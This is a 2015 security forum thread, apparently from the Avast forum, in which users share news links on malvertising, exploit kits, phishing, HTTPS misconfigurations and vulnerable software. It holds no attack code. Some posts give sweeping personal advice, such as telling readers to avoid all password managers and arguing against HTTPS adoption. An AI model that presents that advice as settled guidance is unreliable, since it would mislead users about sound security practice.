Source Евге́ний Валенти́нович Каспе́рский's Official Blog
polonus
-
Once attacked one must defend one's honor and integrity.
-
Once attacked one must defend one's honor and integrity.
Sometimes defending your honor only results to more criticism. :(
-
Once attacked one must defend one's honor and integrity.
Sometimes defending your honor only results to more criticism. :(
How true.
-
Bank of America Phish Seeks Personal Data Bonanza
https://blog.malwarebytes.org/fraud-scam/2015/03/bank-of-america-phish-seeks-personal-data-bonanza/?utm_source=Gplus&utm_medium=social
Nuclear EK leverages recently patched Flash vulnerability
https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/?utm_source=Gplus&utm_medium=social
-
HTTPS-Everywhere, nice initiative, but is it overall secure? "Majority of Web sites currently only use HTTPS for logins or transactions where sensitive data is captured," the analyst Ang Poon Wei, stated.
"Trying to access a Web site that doesn't or partially supports HTTPS would generate different user experiences." Quotes taken from an article by Ellyne Phneah for ZDNet.
This is my experience also. For instance at https://www.on24.com that is trying to load scripts from non-verified sources and older weaker encryption. Even HTTPS-Everywhere green padlocked websites may have security issues the average user may not expect - encryption sequence delivered from the weak end up (misconfiguration),
weakened encryption because excluded from the more secure variety (export restrictions). Security header implementation either missing or full of warnings, check with Recx Security Analyser Extension, so often the unaware user is lulled into a sense of security while the online commercial and governmental tracking goes on. Remember we live in the Golden Age of Global Surveillance. My analysis experiments with SSL scanning in combination with Tracker tracker tool result analysis prove the green padlock may often only present a "bleak or bleached" green ;D
An example for htxps://www.on24.com/ with outdated web server Apache, found vulnerabilities on Apache 2.2 (Apache/2.2.26). See for yourselves attached and the security header status report here: http://www.webpagescreenshot.info/img/550eadaa52b736-52877506
polonus
-
Also users may wonder (what if the given situation is that insecure) what then will be our best means of protection?
Overall Avast protection in the first place naturally. Then inside a browser script blocking and third party access blocking with extensions like, for the Firefox browser, NoScript and RequestPolicy and a decent ad blocker. I use uBlock because it also blocks unobtrusive (Google) ads by default.
For the Google Chrome and Sleipnir user the choice is even less complicated while the handling of the extensions is more user-friendly. A combination of SafeScript extension, HTTP Switchboard extension and uBlock or ABP in right configuration here is all you browser users need. Whenever you need more protection for whatever reason read further here: https://prism-break.org/en/
The site we have analyzed above uses a tracking script named Munchkin. Here is how Glen Lipka, Marketo's first employee and designer, metaphorically describes what the tracking script is supposed to do: "Marketo tracks visitors with a piece of JavaScript called Munchkin. It pays careful attention to each individual fish. It watches where every single fish swims and keeps track of every detail. This is because that fish is going to feed a salesperson one day and he/she will want to know where the fish has been and where it's going so that they can catch the fish effectively. We even score the fish to give the fisherman/salesperson the best chance of success."
The code is an equivalent of the better known Google Analytics. Marketo cookies the visitor first, then request a 1x1 transparent image from their servers with details of the visit in the parameters of the request. That's how it works all the time all of the time under the hood of your browser, folks.
polonus
-
Another example of such a HTTPS Everywhere website with mixed https/http content - could it be vulnerable to HTTPS strip exploits like SSL Strip by Moxie Marlinspike?
Find my tracker tracker report attached for https://www.magellanmodels.com/- do not open links directly into a browser - info provided for research purposes only.
polonus (volunteer website security analyst and website error-hunter)
P.S. Info on the Yotpo Embedded Widget here: http://blog.yotpo.com/2014/03/13/embedded-widget-complete-guide/
cdn6.bigcommerce.com is an analysis tracker
-
New bugs found in common encryption software OpenSSL
http://www.theage.com.au/it-pro/security-it/new-bugs-found-in-common-encryption-software-openssl-20150320-1m3vb9.html
-
China is a gigantic market. This must have been the reason that the number of phishing sites now have doubled and now totals 93.000, 40.00 of which had a backdoor :
http://www.chinadaily.com.cn/china/2015-03/20/content_19869243.htm (source: (Xinhua) China Authorities).
polonus
-
When is enough enough?
22 million PUP detections - http://blog.avira.com/potentially-unwanted-applications-2/
polonus
-
Flash-based SOP circumvention hole coming back to haunt us three years later, thousands of websites affected:
http://www.computerworld.com/article/2901313/flashbased-vulnerability-lingers-on-many-websites-three-years-later.html article author = Lucian Constantin
pol
-
Microsoft Petitions U.S. Government for Surveillance Reform
http://www.eweek.com/security/microsoft-petitions-u.s.-government-for-surveillance-reform.html
Qualys Expands Its SSL/TLS Security Scanning Service
http://www.eweek.com/security/qualys-expands-its-ssltls-security-scanning-service.html
-
Windows Defender Gets Zero Antivirus Protection Points in New Research
http://news.softpedia.com/news/Windows-Defender-Gets-Zero-Antivirus-Protection-Points-in-New-Research-476901.shtml
-
Thirteen year old hole in RC4 encryption algorithm now coming back to haunt us.
30% of TLS sessions still use it : http://investors.imperva.com/phoenix.zhtml?c=247116&p=irol-newsArticle&ID=2028880
Read from TheGoodlookingNerd (info credits go there): http://securityg33k.blogspot.nl/2013/12/ssltls-use-of-weak-rc4-cipher.html
One could test here: https://www.ssllabs.com/ssltest/analyze.html?d=
When you see RC4 Yes WEAK (more info) there is danger.
pol
-
Adult site Xtube compromised, serving exploits
https://blog.malwarebytes.org/exploits-2/2015/03/adult-site-xtube-serves-malware-via-neutrino-ek/?utm_source=Gplus&utm_medium=social
Steam Codes and Countdowns
https://blog.malwarebytes.org/privacy-2/2015/03/steam-codes-and-countdowns/?utm_source=Gplus&utm_medium=social
-
Almost no website is updating their existing jQuery version. I have installed the DetectJQuery user script in Google Chrome via my Tampermonkey extension and it alerts for jQuery and the respective installed jQuery version when jQuery is detected to run on a particular website I visit with the Chrome browser. Folks, the average results can be termed as shocking - the jQuery version is often the version installed at website creation, sometimes so obsolete and also often that vulnerable (to script injection and XSS exploits). Read about another researcher that found out about this unholy security situation in January 2014 (and let me tell you the overall situation has not changed much): http://erlend.oftedal.no/blog/?blogid=140
I alerted for the consequences of this situation here: https://forum.avast.com/index.php?topic=168633.0
polonus (volunteer website security analyst and website error-hunter)
-
Ad-fraud malware hijacks router - inject ads via google analytics:
http://aralabs.com/blog/2015/03/25/ad-fraud-malware-hijacks-router-dns-injects-ads-via-google-analytics/
link article author = Sergei Frankoff
You could test whether you are vulnerable here: https://www.ismydnshijacked.com/
courtesy of F-Secure
D
-
Ad-fraud malware hijacks router - inject ads via google analytics:
http://aralabs.com/blog/2015/03/25/ad-fraud-malware-hijacks-router-dns-injects-ads-via-google-analytics/
link article author = Sergei Frankoff
You could test whether you are vulnerable here: https://www.ismydnshijacked.com/
courtesy of F-Secure
D
And that is why I have Ghostery set to block Google Analytics among others.
-
Hi Para-Noid,
And rightly so, these threats make more and more users seek to block trackers.
From my Tracker tracker results you could establish the constant flow of ad, analytic and widget tracking that goes on under the hood of the browser. Now when these are being hijacked by fraudulent cybercriminals and it is not blocked we're done for. You can paste website links and external links (up to 100) here: https://tools.digitalmethods.net/beta/trackerTracker/ to get a report. See example attached.
polonus
-
Adware: Delivery Methods
https://blog.malwarebytes.org/security-threat/2015/03/adware-delivery-methods/?utm_source=Gplus&utm_medium=social
Well written to be easily understood.
-
Windows: Local WebDAV NTLM Reflection Elevation of Privilege
https://code.google.com/p/google-security-research/issues/detail?id=222
-
'Largest DDoS attack' in GitHub's history targets anticensorship projects
http://www.networkworld.com/article/2903317/microsoft-subnet/largest-ddos-attack-in-githubs-history-targets-anticensorship-projects.html
-
A Week in Security (Mar 23 – 27)
https://blog.malwarebytes.org/online-security/2015/03/a-week-in-security-mar-23-27/?utm_source=Gplus&utm_medium=social
-
Google bans 192 ad-injecting extensions from the browser because of ad-injecting malvertising:
http://www.pcworld.com/article/2904852/google-cracks-down-on-adinjecting-chrome-extensions.html
also read: http://googleonlinesecurity.blogspot.ro/2015/03/out-with-unwanted-ad-injectors.html
polonus
-
Google bans 192 ad-injecting extensions from the browser because of ad-injecting malvertising:
http://www.pcworld.com/article/2904852/google-cracks-down-on-adinjecting-chrome-extensions.html
also read: http://googleonlinesecurity.blogspot.ro/2015/03/out-with-unwanted-ad-injectors.html
polonus
They could do with starting looking at the stuff on the Google Play store ;D
-
They could also block developer mode being enabled by the extensions as well
-
Yes, essexboy, they use Programmatic Injection
chrome.tabs.executeScript(null, {file: "content_script.js"});
-> https://developer.chrome.com/extensions/content_scripts
polonus
-
Keep Wordpress up-to-date!
https://blog.malwarebytes.org/exploits-2/2015/04/compromised-wordpress-sites-launch-drive-by-attacks-off-pirate-bay-clone/?utm_source=Gplus&utm_medium=social
Phony My Team Voice App Being Spread on Steam Chat
https://blog.malwarebytes.org/fraud-scam/2015/03/phony-my-team-voice-app-being-spread-on-steam-chat/?utm_source=Gplus&utm_medium=social
-
Do Not Track disabled by default in new browsers.
http://blogs.microsoft.com/on-the-issues/2015/04/03/an-update-on-microsofts-approach-to-do-not-track/
So whenever you do not want to be ad-tracked anymore it is up to you to change the settings.
It is better to block ad-tracking, widget tracking and analytical trackers,
because you would never know the adtracker will actually honor your DNT demand.
polonus
-
Dell system detect vulnerability
http://www.dell.com/support/article/us/en/19/SLN296576/EN
https://www.f-secure.com/weblog/archives/00002800.html
So if you have a Dell update now
-
Dell system detect vulnerability
http://www.dell.com/support/article/us/en/19/SLN296576/EN
https://www.f-secure.com/weblog/archives/00002800.html
So if you have a Dell update now
Here's some more...https://blog.malwarebytes.org/exploits-2/2015/04/dell-system-detect-vulnerability-now-classified-as-a-pup/?utm_source=Gplus&utm_medium=social
-
Running a Dell here but this is not a problem for me, first thing I did when I got the computer is uninstall anything related to Dell.
So no Dell System Detect here.
-
Dell system detect vulnerability
http://www.dell.com/support/article/us/en/19/SLN296576/EN
https://www.f-secure.com/weblog/archives/00002800.html
So if you have a Dell update now
Wow. Pretty scary one.
-
MBAM detects it as PUP now: https://blog.malwarebytes.org/exploits-2/2015/04/dell-system-detect-vulnerability-now-classified-as-a-pup/ link article author ADAM KUJAWA.
polonus
-
Running a Dell here but this is not a problem for me, first thing I did when I got the computer is uninstall anything related to Dell.
So no Dell System Detect here.
I have 4 Dell computers and none of them have Dell System Detect.
-
Hi -midnight,
You are a clever person to have taken your precautions regarding this ;)
Crap and junk have to go everywhere, so away with this fool's gold. 8)
Enjoy your Easter week-end.
polonus
-
Hi polonus,
Don't know about the clever part. :)
You enjoy your Easter weekend too.
-midnight
-
Google's Gmail SMTP SSL has expired (again):
http://seclists.org/nanog/2015/Apr/120
link posting from David Hubbard.
polonus
-
Just to motivate webmasters and other staff to do a better job -
The Hall of Shame for websites with WP CMS.
See these results, then start to tremble ;D
http://urlfind.org/?generator=wordpress%202
polonus (volunteer website security analyst and website error-hunter)
-
Malwarebytes joins the Online Trust Alliance
https://blog.malwarebytes.org/news/2015/04/malwarebytes-joins-the-online-trust-alliance/?utm_source=Gplus&utm_medium=social
-
ISIL Defacements Exploiting WordPress Vulnerabilities
http://www.ic3.gov/media/2015/150407-1.aspx
-
Only those with stolen certificates threatened by Heartbleed: http://blog.erratasec.com/2015/04/no-75-are-not-vulnerable-to-heartbleed.html
polonus
-
Steer Clear of .SCR Malware “Screenshots”
https://blog.malwarebytes.org/fraud-scam/2015/04/steer-clear-of-scr-malware-screenshots/?utm_source=Gplus&utm_medium=social
-
Beware: “Halifax Classic” Phishing Mail
https://blog.malwarebytes.org/fraud-scam/2015/04/beware-halifax-classic-phishing-mail/?utm_source=Gplus&utm_medium=social
-
China's Great Ddos Cannon: https://citizenlab.org/2015/04/chinas-great-cannon/
link article: : Bill Marczak, John Scott-Railton, Reports and Briefings
Maybe HTTPS Everywhere or a switch to https might not be such a bad idea after all.
polonus
-
A history lesson brought to you by the Nuclear exploit kit
https://blog.malwarebytes.org/exploits-2/2015/04/a-history-lesson-brought-to-you-by-the-nuclear-exploit-kit/?utm_source=Gplus&utm_medium=social
-
SPEAR - Redirect to SMB returns from 1997 haunting us after 18 years:
http://blog.cylance.com/redirect-to-smb
link article author = Brian Wallace
Be aware the problem has not been completely mitigated - you might be at risk!
pol
-
Zombie Vulnerability Affects Every Version of Windows
http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546
-
Zombie Vulnerability Affects Every Version of Windows
http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546
Windows Security Flaw Allows Hackers to Steal Your Usernames and Passwords
http://news.softpedia.com/news/Windows-Security-Flaw-Allows-Hackers-to-Steal-Your-Usernames-and-Passwords-478303.shtml
-
Zombie Vulnerability Affects Every Version of Windows
http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546
Windows Security Flaw Allows Hackers to Steal Your Usernames and Passwords
http://news.softpedia.com/news/Windows-Security-Flaw-Allows-Hackers-to-Steal-Your-Usernames-and-Passwords-478303.shtml
Your link isn't opening in FF. ???
Must have been a momentary Website glitch....
-
I use Google Chrome. It opens fine. Try IE11, or IE12 if you are on Windows 10. I opened it up in IE11 and it opens fine as well.
-
Zombie Vulnerability Affects Every Version of Windows
http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546
Windows Security Flaw Allows Hackers to Steal Your Usernames and Passwords
http://news.softpedia.com/news/Windows-Security-Flaw-Allows-Hackers-to-Steal-Your-Usernames-and-Passwords-478303.shtml
"Among the vulnerable products are security products (AVG Antivirus Free, Norton Security Scan, Bitdefender Free, Comodo Antivirus), Microsoft’s IE, Windows Media Player, Excel 2010, productivity tools (Box Sync, TeamViewer) and developer tools (GitHub, PyCharm, IntelliJ IDEA, PHP Storm, JDK 8u31’s installer)."
Avast isn't mentioned but an assurance from Avast would be appreciated. Thanks
-
Yeah really hope that an assurance from Avast will be much appreciated. I have my desktop Windows 7 SP1 installed with AVG Free 2015 and I will make sure to keep that updated along with other programs such as Adobe, IE, windows media player, and etc updated. Same goes to my laptop that is installed with Avast Free and where I always use avast forum from my laptop.
-
bob3160 perhaps you should report this to moderator so someone from avast team can read this.
-
bob3160 perhaps you should report this to moderator so someone from avast team can read this.
That was done as soon as I made my post. :)
-
bob3160 perhaps you should report this to moderator so someone from avast team can read this.
That was done as soon as I made my post. :)
Oh thanks heaps 8). Should be thanking me too. I am the one who posted it ;D
-
Booby-trapped Hugo Boss Advert Spreads Cryptowall Ransomware
https://blog.malwarebytes.org/malvertising-2/2015/04/booby-trapped-hugo-boss-advert-spreads-cryptowall-ransomware/?utm_source=Gplus&utm_medium=social
Real-Time Bidding and Malvertising: A Case Study
https://blog.malwarebytes.org/malvertising-2/2015/04/real-time-bidding-and-malvertising-a-case-study/?utm_source=Gplus&utm_medium=social
-
Too many dns-servers with misconfigurations. Read: https://www.us-cert.gov/ncas/alerts/TA15-103A
polonus
-
Microsoft Security Bulletin Summary for April 2015
https://technet.microsoft.com/library/security/ms15-apr
-
Microsoft Update, Java Update, and Flash player update. Don't forget to update
https://krebsonsecurity.com/2015/04/critical-updates-for-windows-flash-java/
-
Do Not Track: An Interactive Documentary Series
https://blog.malwarebytes.org/privacy-2/2015/04/do-not-track-an-interactive-documentary-series/?utm_source=Gplus&utm_medium=social
-
“Business Support Giveaway” 419 Scam
https://blog.malwarebytes.org/fraud-scam/2015/04/business-support-giveaway-419-scam/?utm_source=Gplus&utm_medium=social
-
Adware epidemic and what firefox plans to do to add-ons, only signed add-ons allowed: https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/
polonus
-
Critical Windows vulnerability affects at least 70 million websites:
http://news.netcraft.com/archives/2015/04/16/critical-windows-vulnerability-affects-at-least-70-million-websites.html link article author = Netcraft's Paul Mutton.
The vulnerability test for this: https://lab.xpaw.me/MS15-034/
Mind that in China there are an enormous amount of vulnerable MS servers! :o
polonus
-
Oracle does not comment on bundling Ask-toolbar
Ask-toolbar, a very unwelcome guest that can be very persistent.
Read: http://www.latimes.com/business/la-fi-lazarus-20150417-column.html
link article author = David Lazarus
polonus
-
Oracle does not comment on bundling Ask-toolbar
Ask-toolbar, a very unwelcome guest that can be very persistent.
Read: http://www.latimes.com/business/la-fi-lazarus-20150417-column.html
link article author = David Lazarus
polonus
Install Unchecky (http://unchecky.com/), it will uncheck the authorization to install the Ask Toolbar
and prevent it from getting to your computer.
Always use a custom install and read before you click on that Big Button.
-
Good Advice, bob3160, unchecky a must nowadays.
polonus
-
Beware of Chrome extensions, the mantra of the safest browser is now just cant (read the same for Firefox)
It seems that the adware creates a fake extension with another legit extension ID present in the Google Chrome Web Store (only those are allowed in stable Chrome), which uses a manifest.json loading the ads script. I don't know if an extension ID is picked randomly.
e.g. CHR Extension: (bmejphbfclcpmpohkggcjeibfilpamia) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmejphbfclcpmpohkggcjeibfilpamia [2015-04-06]
Note that the ID itself is legit and refers to Netcraft Extension officially hosted on Chrome Web Store:
But that is NOT the Netcraft Extension, but a false copy:
I will not post the code as Avast alerts on it
The problem is, with the amount of extensions people have on Chrome and Firefox, it is impossible to check them all. So from now on, if only "legitimate" IDs appear in either browser, I will be asking for an uninstall.
Something similar is happening on Firefox
-
Flash EK Strikes Again via Google’s DoubleClick
https://blog.malwarebytes.org/malvertising-2/2015/04/flash-ek-strikes-again-via-googles-doubleclick/?utm_source=Gplus&utm_medium=social
Scammers Spam Steam’s Artwork Gallery
https://blog.malwarebytes.org/fraud-scam/2015/04/scammers-spam-steams-artwork-gallery/?utm_source=Gplus&utm_medium=social
-
Addition to my previous post http://it-supernova.com/new-adware-that-integrates-directly-into-the-browser/
-
Another Day, Another 419 Fakeout
https://blog.malwarebytes.org/fraud-scam/2015/04/another-day-another-419-fakeout/?utm_source=Gplus&utm_medium=social
-
Security through obscurity to win? Read: https://www.eff.org/deeplinks/2015/04/united-airlines-stops-researcher-who-tweeted-about-airplane-network-security link article author = ANDREW CROCKER
polonus
-
Interesting website on the European Privacy Debate -
How lobbyists weaken user's data protection for the Safe Harbor big data grabbers:
http://lobbyplag.eu/governments/
polonus
-
Do not continue using Java 7: http://www.infoworld.com/article/2909685/application-development/oracle-cutting-publicly-available-security-fixes-for-java-7-this-month.html link article author = Paul Krill.
Do not use Java when you do not need Java, else update manually to Java 8.
Also consider the Ask toolbar that Java bundles, you might not like to have it on your OS!
polonus
-
"Also consider the Ask toolbar that Java bundles, you might not like to have it on your OS!"
If you've got Unchecky (http://unchecky.com/) installed, it will automatically uncheck the installation of the Ask Toolbar,
even if you happen to miss that nasty addition.
-
Steam Introduce Limited User Accounts
https://blog.malwarebytes.org/online-security/2015/04/steam-introduce-limited-user-accounts/?utm_source=Gplus&utm_medium=social
TeslaCrypt: Video game Safety 101
https://blog.malwarebytes.org/security-threat/2015/04/teslacrypt-videogame-safety-101/?utm_source=Gplus&utm_medium=social
Moral of the story...Be careful on which games you play online, especially MMORPG's.
-
Massive optional Microsoft Patch-Day Incoming
http://www.ghacks.net/2015/04/21/massive-optional-microsoft-patch-day-incoming/
-
Good to see Avast! Antivirus Free doing well and coming in third place
http://www.expertreviews.co.uk/software/internet-security/1403106/kaspersky-and-norton-top-latest-home-security-tests
:)
-
Security Advisory: XSS Vulnerability Affecting Multiple WordPress Plugins
https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
-
Still Bleeding One Year Later—Heartbleed 2015 Research
https://www.venafi.com/blog/post/still-bleeding-one-year-laterheartbleed-2015-research
-
Failed Apple Rootpipe Fix Leaves Backdoor On All Macs, Researchers Claim
http://www.forbes.com/sites/thomasbrewster/2015/04/19/apple-fails-to-patch-rootpipe/
1,500 iOS apps have HTTPS-crippling bug. Is one of them on your device?
http://arstechnica.com/security/2015/04/1500-ios-apps-have-https-crippling-bug-is-one-of-them-on-your-device/
and I thought Macs were fault free ;D
-
Implementing HTTPS Everywhere will make malvertisers harder to detect.
Also read: https://threatpost.com/ad-networks-ripe-for-abuse-via-malvertising/111840
polonus
-
Implementing HTTPS Everywhere will make malvertisers harder to detect.
Also read: https://threatpost.com/ad-networks-ripe-for-abuse-via-malvertising/111840
polonus
I remember when HTTPS Everywhere was all the rage. (It wasn't that long ago either.....)
-
Implementing HTTPS Everywhere will make malvertisers harder to detect.
Also read: https://threatpost.com/ad-networks-ripe-for-abuse-via-malvertising/111840
polonus
I remember when HTTPS Everywhere was all the rage. (It wasn't that long ago either.....)
And I remember I was raging against its use ;D
For a very short time I considered changing my position as avast now scans https content (but not on all OSes), but I'm still of the same position on forcing https. There are some areas where it can help combat 'man in the middle attacks,' but now see there are other compromising issues.
-
Hi bob3160 and DavidR,
Encryption is fine, but when there is malicious code and it comes in in an encrypted way, you cannot scan or check this in advance. What then? And what you say, bob3160, what about https sites with plain txt log-ins? I see a lot of these still. A lot of implementations on HTTPS Everywhere adopted sites are also weak, not to say rather insecure, and so here we go again. What looks right at first glance is not always so in practice.
Well, do you see the problem there? Moreover these malvertising campaigns, lately through an obscure Bulgarian domain, only last a couple of hours, but could make an awful lot of victims. A decent adblocker is a must nowadays.
polonus
-
Hi bob3160 and DavidR,
Encryption is fine, but when there is malicious code and it comes in in an encrypted way, you cannot scan or check this in advance. What then? And what you say, bob3160, what about https sites with plain txt log-ins? I see a lot of these still. A lot of implementations on HTTPS Everywhere adopted sites are also weak, not to say rather insecure, and so here we go again. What looks right at first glance is not always so in practice.
Well, do you see the problem there? Moreover these malvertising campaigns, lately through an obscure Bulgarian domain, only last a couple of hours, but could make an awful lot of victims. A decent adblocker is a must nowadays.
polonus
I, like David, always warned against using HTTPS Everywhere. I haven't changed my mind. :)
-
Hi bob3160,
US users come under special malvertisement threat during U.S. federal holidays and three-day weekends.
Malvertisers from other parts of the world have calendars up just to pick these days.
Google removes hundreds of million bad ads, but of course always some will slip through.
polonus
-
Please enlighten me, what's wrong with HTTPS Everywhere? ???
-
Hi Para-Noid,
There is enough wrong with a lot of HTTPS Everywhere domains: wrong server configurations, missing or wrong security header implementations, mixed content sites, log-ins with alerts for all log-in info going over the wire in plain txt form.
And a lot of other possible issues making the ideal situation look good at first sight, but the real world situation is often as bad as could be (POODLE, BEAST and Heartbleed, certification errors, encryption served "from the weak side up" (surveillance can be performed without much of a hassle)). So a lot of good will going hand in hand with a lot of incompetence and situations where money comes before security. Now you understand that malvertisers are a problem on a normal http website, but when they come encrypted on an https website, in the present situation the detection problem can outgrow the added protocol security.
I perform webscans as volunteer website analyst so I know what I am talking about with thousands of examples scanned.
The Browser JSGuard extension in Chrome and the SaferChromeSecurity extension will give you some good insights into the overall https site insecurities that exist.
polonus
-
Tech Support Spam Plague LinkedIn and Other High-Traffic Sites
https://blog.malwarebytes.org/fraud-scam/2015/04/tech-support-spam-plague-linkedin-and-other-high-traffic-sites/?utm_source=Gplus&utm_medium=social
Thanks polonus for a good explanation. I would never question your credentials as a website analyst.
-
See here for frauds: http://escrow-fraud.com/search.php?&all=&dir=asc&sf=p&start=2521
pol
-
InfoSec Books to Read for World Book Day
https://blog.malwarebytes.org/cyber-crime/2015/04/infosec-books-to-read-for-world-book-day/?utm_source=Gplus&utm_medium=social
-
An Instagram Roundup
https://blog.malwarebytes.org/online-security/2015/04/an-instagram-roundup/?utm_source=Gplus&utm_medium=social
-
What AV vendors have cheated here - according to this infringement report: http://weblog.av-comparatives.org/?p=501
Reason for the apparent fraud would be the fact that users mainly choose an AV vendor based on AV Comparative Security Test Results,
"which is not very clever according to me, but it is the way for people that rely on third party authority as they cannot decide for themselves because of lack of insight." Between brackets I state what is purely my own personal opinion, pol
polonus
-
I would like to know that too:)
-
I think you are not alone there, and I would like to hear Avast's comments in the aftermath if there were any to come.
Well, at least we have to wait until the conclusions have been brought forward of course; they cannot react pending the investigations. But if innocent I would play this out big time; these two infringers should be punished by the market, period.
polonus
-
I would also be interested in seeing the results. :(
(http://www.screencast-o-matic.com/screenshots/u/Lh/1430084131813-73957.png)
-
OMG!!! I hope it ain't one of the major antivirus programs, i.e. Avast, AVG, Norton, McAfee, Kaspersky, and Trend Micro :(
-
OMG!!! I hope it ain't one of the major antivirus programs, i.e. Avast, AVG, Norton, McAfee, Kaspersky, and Trend Micro :(
Speculation is totally out of line. It only starts rumors. :o
-
Speculation is totally out of line. It only starts rumors.
Right you are, bob3160. They should never have presented this in this way
and have mentioned the offending AV vendors when they were ready to do so without delay.
Furthermore it has been reported that there was a party that had sent in pre-prepared results.
polonus
-
OMG!!! I hope it ain't one of the major antivirus programs, i.e. Avast, AVG, Norton, McAfee, Kaspersky, and Trend Micro :(
Speculation is totally out of line. It only starts rumors. :o
I didn't mean it as a rumor, just assuming it won't be any of the top antivirus programs that I have listed there. An assumption. Even though I will stick to AVG Free and Avast Free forever: AVG Free (for my desktop) and Avast Free (for my laptop, where I log in and out and write in this forum). For the other vendors that I have listed it will also be bad for business, as those antivirus products can be bought from retail stores worldwide. Mistakes do happen; hope it can be resolved asap.
-
OMG!!! I hope it ain't one of the major antivirus programs, i.e. Avast, AVG, Norton, McAfee, Kaspersky, and Trend Micro :(
Speculation is totally out of line. It only starts rumors. :o
I didn't mean it as a rumor, just assuming it won't be any of the top antivirus programs that I have listed there. An assumption. Even though I will stick to AVG Free and Avast Free forever: AVG Free (for my desktop) and Avast Free (for my laptop, where I log in and out and write in this forum). For the other vendors that I have listed it will also be bad for business, as those antivirus products can be bought from retail stores worldwide. Mistakes do happen; hope it can be resolved asap.
Never assume, it usually makes an ass out of you and me. :)
-
Ok. Yes Sir! :)
-
If and when AV-C is ready they will reveal the guilty party.
-
Another reason to have a good ad blocker
https://blog.malwarebytes.org/malvertising-2/2015/04/malvertising-strikes-adult-site-xhamster-again/?utm_source=Gplus&utm_medium=social
-
Thank you, Para-Noid, for the heads-up on this.
And folks, remember: when you have plug-ins, activate them on an on-demand basis,
so only when you trust them to run inside the browser.
And remember now you rarely need java, so when not needed uninstall.
polonus
-
Again critical hole in WP CMS: http://klikki.fi/adv/wordpress2.html (disclosed by Jouko Pynnonen )
Sucuri's analysis: http://klikki.fi/adv/wordpress2.html
polonus
-
Yet another reason to have a good ad blocker and MalwareBytes Anti-Exploit
https://blog.malwarebytes.org/privacy-2/2015/04/ads-on-colouring-pages-website-lead-to-installs-explicit-content/?utm_source=Gplus&utm_medium=social
This is getting old in a hurry. The only thing a user can do is to use common sense and be alert and stay up to date with all of the
malicious on-goings on the web. Look before you leap. In other words do some research before you click. It may save you some anguish later.
-
Malware authors go a step further to access bank accounts
https://blog.avast.com/2015/04/27/malware-authors-go-a-step-further-to-access-bank-accounts/
Updated: Kaspersky leaves users open to FREAK attack
On this article you will see this statement: "All the anti-virus applications checked - Avast, Kaspersky and ESET - lower the security of TLS connections in one way or another says Hanno Bock."
http://www.scmagazineuk.com/updated-kaspersky-leaves-users-open-to-freak-attack/article/411470/
Hope Avast read this. Someone please attract my post to the moderators so we can get an answer/clarification about a fix or a solution. Thanks.
-
Hope Avast read this. Someone please attract my post to the moderators so we can get an answer/clarification about a fix or a solution. Thanks.
See: https://forum.avast.com/index.php?topic=170164.0
-
Mac OS X under attack – 10 security packages put to the test
http://www.av-test.org/en/news/news-single-view/mac-os-x-under-attack-10-security-packages-put-to-the-test/
-
Acrobat and Reader support ending for Mac OS X 10.6 and 10.7
http://blogs.adobe.com/documentcloud/acrobat-and-reader-support-ending-for-mac-os-x-10-6-and-10-7/
-
A good reason to take a layered approach in your system security.
https://blog.malwarebytes.org/malvertising-2/2015/04/domain-shadowing-with-a-twist/?utm_source=Gplus&utm_medium=social
-
More iPhone 6 Scams in the Wild
https://blog.malwarebytes.org/fraud-scam/2015/04/more-iphone-6-scams-in-the-wild/?utm_source=Gplus&utm_medium=social
Password Alert for Chrome, and other Extensions
https://blog.malwarebytes.org/privacy-2/2015/04/password-alert-for-chrome-and-other-extensions/?utm_source=Gplus&utm_medium=social
-
Mozilla is phasing out HTTP in favor of HTTPS:
http://news.softpedia.com/news/Mozilla-Is-Phasing-Out-HTTP-Support-a-Legacy-Mode-Will-Be-Available-479895.shtml
and
https://blog.mozilla.org/security/2015/04/30/deprecating-non-secure-http/
and
https://letsencrypt.org/
Websites will have "new features" disabled to pressure them into using TLS.
This all became possible because IE will soon join "Clippy" in the M$' Afterlife,
well at least that is what they plan for the future.
Also Google Chrome is planning to support the transition of HTTP through HTTPS.
Also to better thwart ad-blocking, conflicting with their main income scheme.
My personal question is why replace insecurity with another form of insecurity driven by obscurity and encryption.
Malvertising detection will get harder. Loads and loads of website owners will continue to provide mixed and insecure content and continue their insecure misconfiguration of server and CMS (and plug-ins and themes) and endanger users further through outdated software and vulnerabilities.
First see to it that the protocol is configured securely, educate those that are responsible for a website's security and then think of a transition from http to https.
I have scanned many a so-called HTTPS Everywhere adopted website and what I found there did not make me particularly happy.
Scan for yourselves here: http://cyh.herokuapp.com/cyh (online https and http security header scanner)
Also see loads and loads of sites where the log-in info go in plain txt over the wires. :o
Browser developers in the first place should work on the client side,
not decide what should be on the server side, although they have a right to alert
when and where something is going wrong.
Here a little background info and where the quote was taken from:
http://cryto.net/~joepie91/blog/2015/05/01/on-mozillas-forced-ssl/
link article author = Joepie91.
And here a word from some-one that promotes the transition: http://moz.com/blog/seo-tips-https-ssl
link article author = Cyrus Shepard
polonus
-
“We Need Your Support” Nepal Earthquake 419 Spam
https://blog.malwarebytes.org/fraud-scam/2015/05/we-need-your-support-nepal-earthquake-419-spam/?utm_source=Gplus&utm_medium=social
There is always some idiot trying to prey on those with big hearts.
I have an idea on what to do with them...but it's illegal in the USA.
-
Google Password Alert for the second time bypassed: http://arstechnica.com/security/2015/04/30/behold-the-drop-dead-simply-exploit-that-nukes-googles-password-alert/
Advice: Do not use any Password Managers.
polonus
-
Definitely time to leave Chrome for something more secure
-
Hi essexboy,
You might have a point there. I think it is because the browser became more and more popular. Google Chrome wants too much too soon and within a short time. Marketing dictates and security may give out at a certain moment.
Lately I saw someone could circumvent my google + account security and I had to block some strange entity that wanted to be added to my acquaintances.
It is dangerous to use Password Managers now inside Google Chrome, and that one user model for all Google services is certainly making the attack surface of the client larger and larger. Their bringing in "https-only" will also benefit malcreants' encryption and circumvention (for malvertisers and other cybercriminals), while not every https website is up to those security standards yet to securely run inside Google Chrome.
